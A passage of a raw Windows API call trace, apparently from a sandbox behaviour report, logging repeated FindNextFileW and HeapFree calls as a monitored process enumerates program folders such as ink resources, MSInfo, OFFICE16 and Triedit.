lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0171.707] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.707] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0171.707] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.707] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0171.708] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.708] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0171.708] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.708] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0171.708] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.708] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0171.708] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.708] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0171.709] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.709] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0171.710] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.710] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0171.710] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.710] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0171.710] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.710] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0171.710] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.710] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0171.711] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.711] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0171.711] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.711] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0171.711] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.711] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0171.711] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.711] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0171.711] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.712] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0171.712] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.712] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0171.712] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.712] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0171.712] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.712] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0171.712] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.712] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0171.713] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.713] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0171.713] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.713] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0171.713] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.713] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0171.713] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.713] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0171.714] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.714] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0171.714] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.714] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0171.714] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.714] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0171.715] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0171.715] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0171.715] FindClose (in: hFindFile=0x802498 | out: hFindFile=0x802498) returned 1 [0171.715] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0171.716] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0171.717] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0171.717] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0171.717] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0171.717] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0172.535] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.535] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0172.535] FindClose (in: hFindFile=0x801f58 | out: hFindFile=0x801f58) returned 1 [0172.535] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.604] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0172.604] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.604] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0172.604] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.604] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0172.606] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.606] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0172.606] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.606] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0172.606] FindClose (in: hFindFile=0x801e98 | out: hFindFile=0x801e98) returned 1 [0172.606] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ef7270 | out: hHeap=0x710000) returned 1 [0172.606] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f584 | out: lpFindFileData=0x391f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0172.606] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0172.606] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f308 | out: lpFindFileData=0x391f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, 